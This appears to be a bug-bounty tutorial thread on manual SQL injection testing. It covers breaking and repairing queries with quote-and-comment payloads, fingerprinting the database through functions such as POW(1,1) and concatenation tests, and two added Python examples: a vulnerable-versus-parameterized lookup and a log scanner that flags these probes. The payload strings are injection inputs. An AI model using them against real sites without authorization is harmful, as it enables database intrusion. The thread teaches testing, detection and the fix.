SQLi Manual Approach

Thread 🧵

#bugbounty #bugbountytip #bugbountytips
The first thing to test for SQL injection is to try to break the query, with the intention of learning how the backend builds the SQL statement around our input. This technique works for UNION-based and error-based SQL injection, where we force the backend database to throw an error.
Using this technique we can work out the structure of the backend query and exploit the injection efficiently. The query can be broken by sending various special characters as input.
Afterwards an escape character (\) can be used to confirm exactly which character is breaking the query. Once we know how the input is placed into the SQL statement, we try to break and then fix the query.
This step is necessary to determine where our own query can be placed so that it is executed at the backend.

The query can be fixed in some of the ways below (comment sequences terminate whatever follows the injection point):
''    --+
'    --+
''    #
'     /*    */
'    -- -
'     or    '1
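To show why breaking the query matters, here is an added Python example (not from the original thread) using the standard sqlite3 module: a lookup that pastes the id parameter into the SQL text, next to a version that binds it as a parameter. The table, rows and inputs are constructed for the demonstration; the function names are my own.

```python
import sqlite3


def make_db():
    """Constructed sample table for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(8, "eight"), (9, "nine")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Untrusted input pasted into the SQL text: a quote in the input
    changes the structure of the statement instead of staying data."""
    sql = f"SELECT name FROM items WHERE id = '{user_id}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn, user_id):
    """Bound parameter: the value is sent separately from the statement,
    so quotes and comment markers remain part of the value."""
    row = conn.execute("SELECT name FROM items WHERE id = ?",
                       (user_id,)).fetchone()
    return row[0] if row else None


def probe(conn, user_id):
    """Run the vulnerable lookup and report whether the statement still
    parsed: ('ok', value) when it did, ('error', message) when it broke."""
    try:
        return ("ok", lookup_vulnerable(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    # "8" works in both; "8'" breaks the pasted query (the error the thread
    # looks for); "8' -- " comments out the dangling quote so the pasted
    # query parses again, while the bound version just finds no such id.
    for value in ["8", "8'", "8' -- "]:
        print(repr(value), "pasted:", probe(conn, value),
              "| bound:", lookup_safe(conn, value))
```

The error raised for `8'` is the signal the thread describes; the bound version never produces it because the driver keeps the value out of the statement text, which is the fix a developer should apply.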
To know which DBMS is running at the backend, error messages can tell a lot.

But in the case of blind injection, where no error is shown, another way is to determine it through DBMS-specific numeric functions like:

Oracle: BITAND(1,1)
MySQL: POW(1,1)
SQL Server: SQUARE(1)
For example, if "list.php?id=8" and "list.php?id=9-POW(1,1)" return the same output, POW(1,1) evaluated to 1 (so 9-1 = 8), which means MySQL is running at the backend.

Every DBMS uses a different concatenation operator for text input.
Eg:

Oracle: 'que' || 'ry'
MySQL: 'que' 'ry'
SQL Server: 'que' + 'ry'
For example, if "id=query" and "id='que' || 'ry'" return the same output, it means Oracle is running at the backend.
After fingerprinting the DBMS you can move on to union-based, error-based, blind, and out-of-band injection.
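From the defender's side, the numeric-function and concatenation probes above are easy to spot in web server logs. The following Python example, added here and not part of the original thread, decodes the query string of constructed access-log lines and flags the probe patterns from both passages (a quote followed by a comment sequence, a bare quote that produced a 5xx response, the BITAND/POW/SQUARE fingerprints, and the concatenation operators). The log lines, signature names and function names are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original thread).
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2022:10:01:02 +0000] "GET /list.php?id=8 HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2022:10:01:05 +0000] "GET /list.php?id=8%27 HTTP/1.1" 500 0
10.0.0.5 - - [10/May/2022:10:01:09 +0000] "GET /list.php?id=8%27%20--%20- HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2022:10:01:12 +0000] "GET /list.php?id=9-POW(1,1) HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2022:10:01:15 +0000] "GET /list.php?id=%27que%27%20%7C%7C%20%27ry%27 HTTP/1.1" 200 480
10.0.0.9 - - [10/May/2022:10:02:00 +0000] "GET /list.php?id=12&sort=name HTTP/1.1" 200 700
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) ')
STATUS_RE = re.compile(r'" (\d{3}) ')

# Signature names are constructed labels; the patterns mirror the probes in the thread.
SIGNATURES = [
    ("quote-then-comment", re.compile(r"['\"]\s*(--|#|/\*)")),
    ("bare-quote", re.compile(r"['\"]")),
    ("numeric-fingerprint", re.compile(r"\b(POW|BITAND|SQUARE)\s*\(", re.I)),
    # '||' (Oracle), '+' (SQL Server) or two adjacent literals (MySQL).
    # A raw '+' in a URL decodes to a space, so it falls into the adjacency case.
    ("concat-operator", re.compile(r"'\s*(\|\||\+)\s*'|'\s+'")),
]


def decode_query(line):
    """Return the percent-decoded query string of the request, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = m.group(1)
    if "?" not in path:
        return ""
    return unquote_plus(path.split("?", 1)[1])


def classify(line):
    """List the signature names that match this log line."""
    query = decode_query(line)
    if not query:
        return []
    hits = [name for name, rx in SIGNATURES if rx.search(query)]
    if "quote-then-comment" in hits:
        hits.remove("bare-quote")  # the more specific pattern subsumes it
    status = STATUS_RE.search(line)
    # A quote that turned into a server error is the "broken query" signal.
    if "bare-quote" in hits and status and status.group(1).startswith("5"):
        hits.append("error-after-quote")
    return hits


def scan(log_text):
    """Return (line number, signatures) for every line that matched."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

The rule treats `||` as a generic concatenation probe rather than an Oracle marker, since PostgreSQL and SQLite use the same operator; in practice you would also correlate the sequence of probes from one client, because the ordered pattern (quote, comment, numeric function, concatenation) is more telling than any single request.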

I will be publishing a blog on SQLi on Medium.
